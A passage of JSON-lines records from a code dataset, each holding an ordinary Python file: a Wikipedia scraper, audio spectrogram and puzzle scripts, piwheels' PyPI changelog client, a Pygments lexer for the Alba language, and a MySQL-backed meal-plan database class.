JSON-File.\")\n\n wikipedia = wikipediaapi.Wikipedia(\n args.lang, extract_format=wikipediaapi.ExtractFormat.WIKI\n )\n\n unnecessary_sections = [\n \"Literatur\",\n \"Weblinks\",\n \"Einzelnachweis\",\n \"Einzelnachweise\",\n \"Siehe auch\",\n ]\n\n categories = generate_categories(\n wikipedia,\n wikicategories,\n unnecessary_sections,\n max_articles=args.max_articles,\n min_article_length=args.min_article_length,\n max_article_length=args.max_article_length,\n )\n logging.info(\n \"Successfully generated lists of the articles (time: \"\n + f\"{int((time.time() - start_time) / 60)} minutes).\"\n )\n\n if args.output_format == \"json\":\n with open(\"articles.json\", \"w+\") as f:\n json.dump(categories, f, ensure_ascii=False)\n elif args.output_format == \"csv\":\n import pandas as pd\n\n df = pd.DataFrame([v for k, v in categories.items()])\n df = df.rename(columns={\"Unnamed: 0\": \"id\"})\n df.to_csv(\"articles.csv\", index=False)\n\n else:\n logging.info(\n f\"Output format '{args.output_format}' is unknown. Can't save results.\"\n )\n\n logging.info(f\"Successfully saved the articles.\")\n logging.info(f\"Total runtime: {(round(time.time() - start_time) / 60, 2)} minutes.\")\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n main(args)\n","repo_name":"realjanpaulus/wikicategoryscraper","sub_path":"wikiscraper.py","file_name":"wikiscraper.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17751201090","text":"import matplotlib.pyplot as plt\nimport aifc\nfrom os import walk\nimport numpy\nimport os\nimport librosa\nimport librosa.display\nimport scipy.signal as signal\n\n\ndef get_spec_mel(file):\n save_name = '../Spectrograms/mel_spect/'\n save_name = 'C:\\\\Users\\\\jorge\\\\Desktop\\\\MAI\\\\'\n y, sr = librosa.load(file, duration=196)\n ps = librosa.feature.melspectrogram(y=y, sr=sr, fmax=1024)\n librosa.display.specshow(ps, y_axis='mel', x_axis='time')\n plt.axis('off')\n plt.savefig(save_name + file[20:-5] + '.png',\n dpi=100, # Dots per inch\n frameon='false',\n aspect='normal',\n bbox_inches='tight',\n pad_inches=0) # Spectrogram saved as a .png\n plt.show()\n plt.close()\n\n\ndef get_spec_scipy(file):\n save_name = '../Spectrograms/scipy_spect/'\n save_name = 'C:\\\\Users\\\\jorge\\\\Desktop\\\\MAI\\\\scipy'\n with aifc.open(file, 'r') as f:\n nframes = f.getnframes()\n strsig = f.readframes(nframes)\n data = numpy.fromstring(strsig, numpy.short).byteswap()\n f, t, sxx = signal.spectrogram(data)\n plt.pcolormesh(t, f, sxx)\n plt.axis('off')\n plt.savefig(save_name + file[20:-5] + '.png',\n dpi=100, # Dots per inch\n frameon='false',\n aspect='normal',\n bbox_inches='tight',\n pad_inches=0) # Spectrogram saved as a .png\n plt.show()\n plt.close()\n\n\ndef split_list(alist, wanted_parts=1):\n length = len(alist)\n return [alist[i*length // wanted_parts: (i+1)*length // wanted_parts]\n for i in range(wanted_parts) ]\n\n\ndef get_files(folder_path):\n audio_files = []\n for (dirpath, dirnames, filenames) in walk(folder_path):\n audio_files.extend(filenames)\n return audio_files\n\n\nif __name__ == '__main__':\n path = '../KaggleData/train/'\n list_files = os.listdir(path)\n split = split_list(list_files, 8)\n print(len(split[0]))\n import random\n file = random.choice([path + fil for fil in list_files])\n get_spec_mel(file)\n\n get_spec_scipy(file)\n","repo_name":"JorgeRodri/WhaleClassificationDisk","sub_path":"mel_scipy_for_cluster.py","file_name":"mel_scipy_for_cluster.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26606371648","text":"def is_substring(A,B):\r\n count = 0\r\n for i in A:\r\n if i in B:\r\n count +=1\r\n if count == len(A):\r\n return True\r\n else:\r\n return False\r\n\r\nfile = open(\"A-small-attempt.in\",'r')\r\nl = int(file.readline())\r\ntemp = file.read().splitlines()\r\nfor i in range(l):\r\n print(\"CASE #\"+str(i)+\": \",end='') \r\n B = temp[i]\r\n A = {\"ZERO\": 0, \"ONE\": 0, \"TWO\": 0, \"THREE\": 0, \"FOUR\": 0, \"FIVE\":0, \"SIX\":0, \"SEVEN\":0, \"EIGHT\":0, \"NINE\":0}\r\n C = {\"ZERO\": 0, \"ONE\": 1, \"TWO\": 2, \"THREE\": 3, \"FOUR\": 4, \"FIVE\":5, \"SIX\":6, \"SEVEN\":7, \"EIGHT\":8, \"NINE\":9}\r\n D =[]\r\n for i in A:\r\n if (is_substring(i,B)):\r\n A[i] = 1\r\n \r\n for i in A:\r\n if A[i] == 1:\r\n D.append(C[i])\r\n \r\n \r\n for i in set(D):\r\n print(i,end='')\r\n print('')\r\n \r\n","repo_name":"Patrikejane/problemSolving","sub_path":"codejam/round 1B/Q1/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34912943700","text":"\"Defines :class:`PyPI`, the low level interface to PyPI's event log.\"\n\nimport re\nimport socket\nimport logging\nimport http.client\nimport xmlrpc.client\nfrom bisect import bisect_left\nfrom operator import itemgetter\nfrom functools import lru_cache\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta, timezone\nfrom urllib.parse import urlsplit, urlunsplit\nfrom pathlib import PosixPath\n\nimport requests\nfrom urllib3.exceptions import TimeoutError\nfrom requests.exceptions import RequestException\nfrom simplejson.errors import JSONDecodeError\n\nfrom . import __version__\nfrom .format import canonicalize_name\n\n\nUTC = timezone.utc\n\n# see notes in PyPIBuffer\nPYPI_EPOCH = 628000\nPYPI_MARGIN = 2000\n\nlogging.getLogger('requests').setLevel(logging.WARNING)\nlogging.getLogger('urllib3').setLevel(logging.WARNING)\nlogger = logging.getLogger('pypi')\n\n\nclass PiWheelsTransport(xmlrpc.client.SafeTransport):\n \"\"\"\n Drop in Transport for xmlrpc.client that uses a custom User-Agent string\n (so PyPI can identify our requests more easily in case we're being\n naughty!) and which uses requests for good TLS support and timeouts.\n \"\"\"\n user_agent = 'piwheels/%s' % __version__\n\n def __init__(self, use_https=True, cert=None, verify=None, timeout=10,\n *args, **kwargs):\n self.cert = cert\n self.verify = verify\n self.use_https = use_https\n self.timeout = timeout\n super().__init__(*args, **kwargs)\n\n def request(self, host, handler, request_body, verbose):\n headers = {\n 'User-Agent': self.user_agent,\n 'Content-Type': 'text/xml',\n }\n url = self._build_url(host, handler)\n resp = requests.post(url, data=request_body, headers=headers,\n stream=True, cert=self.cert, verify=self.verify,\n timeout=self.timeout)\n try:\n resp.raise_for_status()\n except RequestException as exc:\n raise xmlrpc.client.ProtocolError(url, resp.status_code,\n str(exc), resp.headers)\n else:\n self.verbose = verbose\n return self.parse_response(resp.raw)\n\n def _build_url(self, host, handler):\n scheme = 'https' if self.use_https else 'http'\n return '%s://%s/%s' % (scheme, host, handler.lstrip('/'))\n\n\nclass PyPIBuffer:\n \"\"\"\n An iterator that provides an ordered buffer of PyPI events from the\n specified *serial* number.\n\n Early PyPI events are ... a bit of mess. Prior to serial #628000 (roughly),\n events have a habit of jumping backwards in time, and not just by a few\n seconds but by several days or even years in some cases. This leads to all\n sorts of fun including deletions before packages exist, and so on. Even\n after #628000, timestamps can go backwards but never by more than 3 minutes\n (that I've seen so far).\n\n To work around this this class does several things. Considering #628000 as\n the \"epoch\" of reliability:\n\n 1. If the starting *serial* is before the epoch, actually read from event 0\n and just start yielding once *serial* is reached as events before the\n epoch after effectively unordered.\n\n 2. Buffer all events as they are received, sorting the buffer by timestamp.\n\n 3. Yield nothing until the epoch is reached (actually 5 minutes after the\n epochal event).\n\n 4. Once the epoch is reached only yield events once the maximum timestamp\n in the buffer is > 5 minutes after the event being yielded.\n\n 5. For whatever starting serial is selected, actually start reading N\n serials earlier where N is currently 2000 which is a number larger than\n the maximum number of events PyPI has generated in a 5 minute period\n in the last few years (see note below).\n\n 5. To permit the system to remain reasonably responsive, end iteration\n after each network transaction.\n\n In 2013, there was an anomalous 5 minute period during which >16k events\n appear. However, this appears to be a result of \"tidying up\" around the\n reliability epoch. Thereafter, the number of events in a 5 minute period\n has never exceeded 1480 (and even that was relatively anomalous), hence the\n selection of 2000 as a safety margin.\n\n This algorithm does have the strange side-effect that, if iterating from\n the start of the PyPI history, the first several iterations will yield\n nothing (while the class is buffering up to the epoch), then suddenly ~600k\n rows will suddenly appear. Thereafter, ~50k rows will be yielded at a time.\n \"\"\"\n\n def __init__(self, *, serial=0, pypi_xmlrpc='https://pypi.org/pypi'):\n self._transport = PiWheelsTransport()\n self._client = xmlrpc.client.ServerProxy(pypi_xmlrpc, self._transport)\n self.serial = serial\n\n @property\n def serial(self):\n \"\"\"\n The next smallest serial to yield. Defaults to 0. Can be set after\n construction but doing so while actually start from a point some way\n before the requested serial to deal with re-ordering of events. In\n the case of pre-epoch events (see class documentation), the buffer will\n actually read from the start anyway.\n\n Note that the actual serial requested may not exist as PyPI can \"skip\"\n serials (presumably due to transaction rollbacks), so this property\n simply guarantees that the next returned serial will be greater than or\n equal to the one requested.\n \"\"\"\n return self._serial\n\n @serial.setter\n def serial(self, value):\n self._serial = value\n self._buffer = []\n self._next_serial = max(0, (\n 0 if value < PYPI_EPOCH else value) - PYPI_MARGIN)\n self._serial_timestamp = None\n\n def _get_events(self, serial):\n # On rare occasions we get some form of HTTP improper state, or DNS\n # lookups fail. In this case just return an empty list and try again\n # later. If we get a protocol error with error 5xx it's a server-side\n # problem, so we again return an empty list and try later\n try:\n return [\n tuple(event) for event in\n self._client.changelog_since_serial(serial)\n ]\n except (OSError, http.client.ImproperConnectionState, TimeoutError) as exc:\n return []\n except xmlrpc.client.Fault as exc:\n if exc.faultCode == -32500:\n return [] # HTTPTooManyRequests; back off and try again\n else:\n raise\n except xmlrpc.client.ProtocolError as exc:\n if exc.errcode >= 500:\n return []\n else:\n raise\n\n def __iter__(self):\n events = self._get_events(self._next_serial)\n if not events:\n return\n # Tuple layout is (package, version, timestamp, action, serial) and\n # output of _get_events is assumed to be sorted by serial\n last_serial = self._next_serial\n self._next_serial = events[-1][4]\n if self._serial_timestamp is None and self._serial <= self._next_serial:\n # Find the timestamp of the event we want in the serial-sorted\n # events, so we can easily find it in the timestamp-sorted\n # buffer\n self._serial_timestamp = events[\n bisect_left([event[4] for event in events], self._serial)][2]\n self._buffer.extend(events)\n if self._next_serial <= PYPI_EPOCH:\n # Don't yield anything until we're past the epoch\n return\n if self._serial_timestamp is None:\n # We haven't yet located the serial we're seeking in the buffered\n # events\n return\n self._buffer.sort(key=itemgetter(2, 4))\n finish_timestamp = self._buffer[-1][2] - (5 * 60)\n if self._serial_timestamp >= finish_timestamp:\n # The serial we're seeking occurred within 5 minutes of the final\n # timestamp in the buffer; wait for more events\n return\n times = [event[2] for event in self._buffer]\n start = bisect_left(times, self._serial_timestamp)\n finish = bisect_left(times, finish_timestamp)\n # start is guaranteed to be at the same timestamp as serial, but\n # timestamps only have per-second resolution so there's likely to be\n # several serials with the same timestamp; wind start forward until we\n # find at least the serial as we're seeking (the serial we're seeking\n # isn't guaranteed to exist)\n while (\n self._buffer[start][2] == self._serial_timestamp and\n self._buffer[start][-1] < self._serial):\n start += 1\n assert self._buffer[start][2] == self._serial_timestamp\n assert start < finish\n for row in self._buffer[start:finish]:\n yield row\n self._serial_timestamp = self._buffer[finish][2]\n self._serial = self._buffer[finish][4]\n del self._buffer[:finish]\n\n\nclass PyPIEvents:\n \"\"\"\n When treated as an iterator, this class yields (package, version, timestamp,\n action) tuples indicating new packages or package versions registered on\n PyPI where action is one of 'create', 'source', 'remove', 'yank' or\n 'unyank'. A small attempt is made to avoid duplicate reports, but we don't\n attempt to avoid reporting stuff already in the database (it's simpler to\n just start from the beginning of PyPI's log and work through it).\n\n The iterator only retrieves a small batch of entries at a time as PyPI\n (very sensibly) limits the number of entries in a single query (to 50,000\n at the time of writing), so the instance will need repeated querying to\n retrieve all rows (this works in our favour though as it means there's an\n obvious place to poll for control events between batches).\n\n :param str pypi_root:\n The web address at which to find the PyPI XML-RPC server.\n\n :param int serial:\n The serial number of the event from which to start reading.\n\n :param int cache_size:\n The size of the internal cache used to attempt to avoid duplicate\n reports.\n \"\"\"\n # pylint: disable=too-few-public-methods\n add_file_re = re.compile(r'^add ([^ ]+) file')\n create_re = re.compile(r'^create$')\n remove_re = re.compile(r'^remove(?: (?:project|release))?$')\n yank_re = re.compile(r'^yank release$')\n unyank_re = re.compile(r'^unyank release$')\n\n def __init__(self, *, pypi_xmlrpc='https://pypi.org/pypi',\n pypi_json='https://pypi.org/pypi',\n serial=0, cache_size=1000):\n self._buffer = PyPIBuffer(serial=serial, pypi_xmlrpc=pypi_xmlrpc)\n self._next_read = datetime.now(tz=UTC)\n # Keep a list of the last cache_size (package, version) tuples so we\n # can make a vague attempt at reducing duplicate reports\n self._versions = OrderedDict()\n self._versions_size = cache_size\n self._pypi_json = pypi_json\n\n @property\n def serial(self):\n return self._buffer.serial\n\n @serial.setter\n def serial(self, value):\n self._buffer.serial = value\n\n def _get_description(self, package):\n \"\"\"\n Look up the project description for *package* using PyPI's legacy JSON\n API\n \"\"\"\n return pypi_package_description(package, pypi_url=self._pypi_json)\n\n def _check_new_version(self, package, version, timestamp, action):\n try:\n self._versions.move_to_end((package, version))\n except KeyError:\n self._versions[(package, version)] = (timestamp, action)\n yield (package, version, timestamp, action)\n else:\n # This (package, version) combo was already cached; unless it's\n # a change from binary-only to source, don't bother emitting it\n (last_timestamp, last_action) = self._versions[(package, version)]\n if (last_action, action) == ('create', 'source'):\n self._versions[(package, version)] = (last_timestamp, action)\n yield (package, version, last_timestamp, action)\n while len(self._versions) > self._versions_size:\n self._versions.popitem(last=False)\n\n def __iter__(self):\n # The next_read flag is used to delay reads to PyPI once we get to the\n # end of the event log entries\n if datetime.now(tz=UTC) > self._next_read:\n events = list(self._buffer)\n if events:\n for (package, version, timestamp, action, serial) in events:\n timestamp = datetime.fromtimestamp(timestamp, tz=UTC)\n match = self.add_file_re.search(action)\n if match is not None:\n action = (\n 'source' if match.group(1) == 'source' else\n 'create')\n for package, version, timestamp, action in \\\n self._check_new_version(\n package, version, timestamp, action):\n description = self._get_description(package)\n yield (package, version, timestamp, action, description)\n elif self.create_re.search(action) is not None:\n description = self._get_description(package)\n yield (package, None, timestamp, 'create', description)\n elif self.remove_re.search(action) is not None:\n # If version is None here, indicating package deletion\n # we could search and remove all corresponding versions\n # from the cache but, frankly, it's not worth it\n if version is not None:\n self._versions.pop((package, version), None)\n yield (package, version, timestamp, 'remove', None)\n elif self.yank_re.search(action) is not None:\n yield (package, version, timestamp, 'yank', None)\n elif self.unyank_re.search(action) is not None:\n yield (package, version, timestamp, 'unyank', None)\n else:\n # If the read is empty we've reached the end of the event log\n # or an error has occurred; make sure we don't bother PyPI for\n # another 10 seconds\n self._next_read = datetime.now(tz=UTC) + timedelta(seconds=10)\n\n\n@lru_cache(maxsize=100)\ndef pypi_package_description(package, pypi_url='https://pypi.org/pypi'):\n \"\"\"\n Look up the project description for *package* using PyPI's legacy JSON\n API, rooted at *pypi_url*.\n \"\"\"\n pypi_url = urlsplit(pypi_url)\n path = PosixPath(pypi_url.path) / package / 'json'\n url = urlunsplit(pypi_url._replace(path=str(path)))\n try:\n resp = requests.get(url, timeout=10)\n resp.raise_for_status()\n except requests.Timeout:\n # SSL connection or read timed out; this isn't critical so just\n # return None and assume we'll pick it up later\n return None\n except requests.ConnectionError:\n # Failed to establish connection; usually \"Connection refused\"\n # which means we're hammering PyPI too much; give up for now and\n # assume we'll pick it up later\n return None\n except requests.exceptions.TooManyRedirects:\n # Too many redirects; again just return None as above\n return None\n except requests.HTTPError as exc:\n if exc.response.status_code >= 500:\n # Server side error; probably a temporary service failure.\n # Because the package description isn't critical just ignore it\n # and return None for now and assume we'll pick it up at a\n # later point\n return None\n elif exc.response.status_code == 404:\n # We may be requesting a description for a package that was\n # subsequently deleted; return None\n return None\n elif exc.response.status_code == 408:\n # Another timeout type; again just return None as above\n return None\n else:\n raise\n data = resp.json()\n try:\n description = data['info']['summary']\n except KeyError as exc:\n logger.error('%s missing when getting description for %s',\n exc, package)\n return None\n else:\n if description is None:\n return ''\n elif len(description) > 200:\n return description[:199] + '…'\n else:\n return description\n","repo_name":"piwheels/piwheels","sub_path":"piwheels/pypi.py","file_name":"pypi.py","file_ext":"py","file_size_in_byte":16755,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"52"} +{"seq_id":"7944800704","text":"from pygments.lexer import RegexLexer\nfrom pygments import token\nfrom pygments import style\nfrom sphinx.highlighting import lexers\n\n__version__ = '0.0.1'\n\n\nclass AlbaStyle(style.Style):\n default_style = \"\"\n styles = {\n token.Comment: 'italic #888',\n token.Keyword: 'bold #005',\n token.Name: '#f00',\n token.Name.Function: '#0f0',\n token.Name.Class: 'bold #0f0',\n token.String: 'bg:#eee #111'\n }\n\n\n\n\nclass AlbaLexer(RegexLexer):\n name = 'alba'\n aliases = ['Alba']\n filenames = ['*.al', '*.ali']\n mimetypes = ['text/x-alba']\n\n# token types:\n# Error, Whitespace, Number, String, Literal, Operator,\n# Comment, Punctuation, Name, Other, Keyword, Generic\n\n\n tokens = {\n 'root': [\n (r'\\s+', token.Text),\n (r'--.*', token.Comment.Singleline),\n (r'{\\|', token.Comment.Multiline, 'comment'),\n (r'\\b(all|and|And|Any|case|class|do|else|ghost|in|if|inspect|Level|let|module|mutual|not|Not|once|or|Or|Prop|record|ref|section|some|then|use|where)\\b',\n token.Keyword),\n (r'[a-zA-Z][a-zA-Z_0-9]*', token.Name),\n (r'[0-9]+', token.Number),\n (r'[+*/:=~\\\\-]',token.Operator),\n (r'.', token.Text)\n ],\n 'comment': [\n (r'{\\|', token.Comment.Multiline, '#push'),\n (r'[^|}]', token.Comment.Multiline),\n (r'\\|}', token.Comment.Multiline, '#pop'),\n (r'[|}]', token.Comment.Multiline)\n ]\n\n }\n\n\n\n\n#lexers['alba'] = AlbaLexer(startinline=True)\nlexers['alba'] = AlbaLexer()\n\n\n\n\n\ndef setup (app):\n return {'version' : '0.0.1'}\n","repo_name":"hbr/tex_alba_design","sub_path":"sphinx/source/alba_lexer.py","file_name":"alba_lexer.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5987346884","text":"import math\nimport random\n\n\ndef all_numbers(max):\n total = []\n for v in range(max):\n count = int(random.randrange(max))\n final = total.append(count)\n print(total)\n\n\nprint('Enter a number between 5 - 40')\nnumber = int(input())\n\nall_numbers(number)\n\n\n\n","repo_name":"phil-baller/learning-python","sub_path":"functions/learning_functions.py","file_name":"learning_functions.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3236775978","text":"import mysql.connector\n\nfrom schemas import Recipe, Ingredient, Step, MealPlan, MealPlanEntry\n\nMYSQL_DATABASE_URL = \"mysql+mysqlconnector://root:21304@127.0.0.1:3306/mealplan\"\n\n\n# connect to the database\nclass db:\n def __init__(self):\n self.conn = mysql.connector.connect(user='root',\n password='21304',\n host='127.0.0.1',\n database='mealplan')\n self.cursor = self.conn.cursor()\n # cursor.execute html escapes tuples, preventing sql injection\n\n # drop all tables\n def drop_all(self):\n # drop all tables\n self.cursor.execute(\"DROP TABLE IF EXISTS meal_plan_entries\")\n self.cursor.execute(\"DROP TABLE IF EXISTS meal_plans\")\n self.cursor.execute(\"DROP TABLE IF EXISTS saved_recipes\")\n self.cursor.execute(\"DROP TABLE IF EXISTS steps\")\n self.cursor.execute(\"DROP TABLE IF EXISTS ingredients\")\n self.cursor.execute(\"DROP TABLE IF EXISTS recipes\")\n self.cursor.execute(\"DROP TABLE IF EXISTS users\")\n self.conn.commit()\n\n # create user table\n def create_user_table(self):\n self.cursor.execute(\"CREATE TABLE users \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"username VARCHAR(255) NOT NULL UNIQUE, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"email VARCHAR(255) NOT NULL UNIQUE)\")\n self.conn.commit()\n\n # create recipe table\n def create_recipes_table(self):\n self.cursor.execute(\"CREATE TABLE recipes \"\n \"(id VARCHAR(12) PRIMARY KEY, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"description MEDIUMTEXT, \"\n \"image_src VARCHAR(255)) \")\n self.conn.commit()\n\n # ingredients table\n def create_ingredients_table(self):\n self.cursor.execute(\"CREATE TABLE ingredients \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"qty varchar(255), \"\n \"unit VARCHAR(255), \"\n \"recipe_id VARCHAR(12), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # steps table\n def create_steps_table(self):\n self.cursor.execute(\"CREATE TABLE steps \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"text MEDIUMTEXT, \"\n \"step_num INT, \"\n \"recipe_id VARCHAR(12), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # saved recipes table\n def create_saved_recipes_table(self):\n self.cursor.execute(\"CREATE TABLE saved_recipes \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"user_id INT, \"\n \"recipe_id VARCHAR(12), \"\n \"FOREIGN KEY (user_id) REFERENCES users(id), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # meal plans table\n def create_meal_plans_table(self):\n self.cursor.execute(\"CREATE TABLE meal_plans \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"user_id INT, \"\n \"start_date DATE, \"\n \"end_date DATE, \"\n \"FOREIGN KEY (user_id) REFERENCES users(id))\")\n self.conn.commit()\n\n # create meal plan entries table\n def create_meal_plan_entry_table(self):\n self.cursor.execute(\"CREATE TABLE meal_plan_entries \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"mealplan_id INT, \"\n \"recipe_id VARCHAR(12), \"\n \"date DATE, \"\n \"meal VARCHAR(9), \" # breakfast, lunch, dinner, snack\n \"FOREIGN KEY (mealplan_id) REFERENCES meal_plans(id), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # create a new user\n def create_user(self, name, username, email):\n self.cursor.execute(\"INSERT INTO users \"\n \"(name, username, email) \"\n \"VALUES (%s, %s, %s)\",\n (name, username, email))\n self.conn.commit()\n id = self.get_user_by_username(username)[0]\n return {\"user_id\": id}\n\n\n # get a user by username\n def get_user_by_username(self, username):\n self.cursor.execute(\"SELECT * FROM users WHERE username = %s\", (username,))\n user = self.cursor.fetchone()\n return user\n\n # get all users\n def get_all_users(self):\n self.cursor.execute(\"SELECT * FROM users\")\n users = self.cursor.fetchall()\n return users\n\n # create a new recipe\n def create_recipe(self, id, name, description, image_src):\n # check if recipe already exists\n self.cursor.execute(\"SELECT * FROM recipes WHERE id = %s\", (id,))\n recipe = self.cursor.fetchone()\n if recipe is None:\n self.cursor.execute(\"INSERT INTO recipes \"\n \"(id, name, description, image_src) \"\n \"VALUES (%s, %s, %s, %s)\", (id, name, description, image_src))\n self.conn.commit()\n return True\n else:\n return False\n\n # create recipe ingredients\n def create_ingredient(self, name, qty, unit, recipe_id):\n self.cursor.execute(\"INSERT INTO ingredients \"\n \"(name, qty, unit, recipe_id) \"\n \"VALUES (%s, %s, %s, %s)\", (name, qty, unit, recipe_id))\n self.conn.commit()\n\n def create_step(self, text, step_num, recipe_id):\n self.cursor.execute(\"INSERT INTO steps \"\n \"(text, step_num, recipe_id) \"\n \"VALUES (%s, %s, %s)\", (text, step_num, recipe_id))\n self.conn.commit()\n\n # get all recipes\n def get_many_recipes(self):\n self.cursor.execute(\"SELECT id FROM recipes\")\n recipe_list = self.cursor.fetchall()\n all_recipes = []\n for row_tuple in recipe_list:\n recipe = self.get_recipe_by_id(row_tuple[0])\n all_recipes.append(recipe)\n return all_recipes\n\n # get a recipe by id\n def get_recipe_by_id(self, id):\n self.cursor.execute(\"SELECT * FROM recipes WHERE id = %s\", (id,))\n recipe = self.cursor.fetchone()\n # create a recipe object\n if recipe is not None:\n # get ingredients\n self.cursor.execute(\"SELECT * FROM ingredients WHERE recipe_id = %s\", (id,))\n ingredients_tuple = self.cursor.fetchall()\n ingredients = []\n for ingredient in ingredients_tuple:\n ingredients.append(\n Ingredient(id=ingredient[0], name=ingredient[1], qty=ingredient[2], unit=ingredient[3]))\n # get steps\n self.cursor.execute(\"SELECT * FROM steps WHERE recipe_id = %s\", (id,))\n steps_tuple = self.cursor.fetchall()\n steps = []\n for step in steps_tuple:\n steps.append(Step(id=step[0], text=step[1], step_num=step[2]))\n # create the recipe object\n recipe = Recipe(id=id, name=recipe[1], description=recipe[2], image_src=recipe[3], ingredients=ingredients,\n steps=steps)\n return recipe\n else:\n return {\"message\": \"Recipe not found\"}\n\n # search for recipes\n def search_recipes(self, search_field, search_txt, limit):\n if search_field == \"name\":\n # TODO: refactor this to be able to search for multiple names\n self.cursor.execute(\"SELECT id FROM recipes WHERE name LIKE %s LIMIT %s\", (search_txt, limit))\n elif search_field == \"ingredients\":\n # TODO: refactor this to be able to search ingredients that are not exact matches\n ingredients = search_txt.split(\", \")\n # for each ingredient in the list, get the recipe ids and then inner join them\n query = \"SELECT recipe_id FROM ingredients WHERE name LIKE %s\"\n for i in range(1, ingredients.__len__()):\n query += \" INTERSECT SELECT recipe_id FROM ingredients WHERE name LIKE %s\"\n query += \" LIMIT %s\"\n # create a tuple of the ingredients and the limit\n ingredients.append(limit)\n query_tuple = tuple(ingredients)\n self.cursor.execute(query, query_tuple)\n else:\n return {\"message\": \"Invalid search field\"}\n # get the recipe ids using the queries previously made\n found_recipes = self.cursor.fetchall()\n # check if no recipes were found\n if found_recipes.__len__() == 0:\n return {\"message\": \"No recipes found\"}\n else:\n recipes = []\n for recipe in found_recipes:\n recipes.append(self.get_recipe_by_id(recipe[0]))\n return recipes\n\n # save a recipe for a user\n def save_recipe(self, user_id, mealplan_id):\n self.cursor.execute(\"INSERT INTO saved_recipes \"\n \"(user_id, recipe_id) \"\n \"VALUES (%s, %s)\", (user_id, mealplan_id))\n self.conn.commit()\n return {\"message\": \"Recipe saved\"}\n\n def add_to_meal_plan(self, recipe_id, meal, mealplan_id, date):\n self.cursor.execute(\"INSERT INTO meal_plan_entries \"\n \"(recipe_id, meal, mealplan_id, date) \"\n \"VALUES (%s, %s, %s, %s)\", (recipe_id, meal, mealplan_id, date))\n self.conn.commit()\n return {\"message\": \"Recipe added to meal plan\"}\n\n def create_new_meal_plan(self, name, start_date, end_date, user_id):\n self.cursor.execute(\"INSERT INTO meal_plans \"\n \"(name, start_date, end_date, user_id) \"\n \"VALUES (%s, %s, %s, %s)\", (name, start_date, end_date, user_id))\n self.conn.commit()\n return {\"message\": \"Meal plan created\"}\n\n def get_shopping_list(self, mealplan_id):\n self.cursor.execute(\"SELECT * FROM meal_plan_entries WHERE mealplan_id = %s\", (mealplan_id,))\n meal_plan_entries = self.cursor.fetchall()\n shopping_list = []\n for entry in meal_plan_entries:\n recipe = self.get_recipe_by_id(entry[2])\n for ingredient in recipe.ingredients:\n shopping_list.append(ingredient)\n return shopping_list\n\n def get_mealplans(self, user_id):\n self.cursor.execute(\"SELECT * FROM meal_plans WHERE user_id = %s\", (user_id,))\n mealplans = self.cursor.fetchall()\n\n # create a list of mealplan objects\n mealplan_list = []\n\n for mealplan in mealplans:\n id = mealplan[0]\n name = mealplan[1]\n start_date = str(mealplan[3])\n end_date = str(mealplan[4])\n user_id = mealplan[2]\n # get the meal plan entries\n self.cursor.execute(\"SELECT * FROM meal_plan_entries WHERE mealplan_id = %s\", (id,))\n meal_plan_entries = self.cursor.fetchall()\n\n # create a list of meal plan entry objects\n meal_plan_entry_list = []\n for entry in meal_plan_entries:\n entry_id = entry[0]\n mealplan_id = entry[1]\n recipe_id = entry[2]\n date = str(entry[3])\n meal = entry[4]\n meal_plan_entry_list.append(MealPlanEntry(id=entry_id, mealplan_id=mealplan_id, recipe_id=recipe_id, date=date, meal=meal))\n\n # create the meal plan object\n mealplan_list.append(MealPlan(id=id, name=name, start_date=start_date, end_date=end_date, user_id=user_id, entries=meal_plan_entry_list))\n return mealplan_list\n\n def copy_mealplan(self, mealplan_id):\n # get the meal plan\n self.cursor.execute(\"SELECT * FROM meal_plans WHERE id = %s\", (mealplan_id,))\n mealplan = self.cursor.fetchone()\n # create a new meal plan with the same name\n self.cursor.execute(\"INSERT INTO meal_plans \"\n \"(name, start_date, end_date, user_id) \"\n \"VALUES (%s, %s, %s, %s)\", (mealplan[1]+\"(copy)\", mealplan[3], mealplan[4], mealplan[2]))\n self.conn.commit()\n # get the new meal plan id\n self.cursor.execute(\"SELECT id FROM meal_plans WHERE name = %s\", (mealplan[1]+\"(copy)\",))\n new_mealplan_id = self.cursor.fetchone()[0]\n # get the meal plan entries\n self.cursor.execute(\"SELECT * FROM meal_plan_entries WHERE mealplan_id = %s\", (mealplan_id,))\n meal_plan_entries = self.cursor.fetchall()\n # copy the meal plan entries\n for entry in meal_plan_entries:\n self.cursor.execute(\"INSERT INTO meal_plan_entries \"\n \"(recipe_id, meal, mealplan_id, date) \"\n \"VALUES (%s, %s, %s, %s)\", (entry[2], entry[4], new_mealplan_id, entry[3]))\n self.conn.commit()\n return {\"message\": \"Meal plan 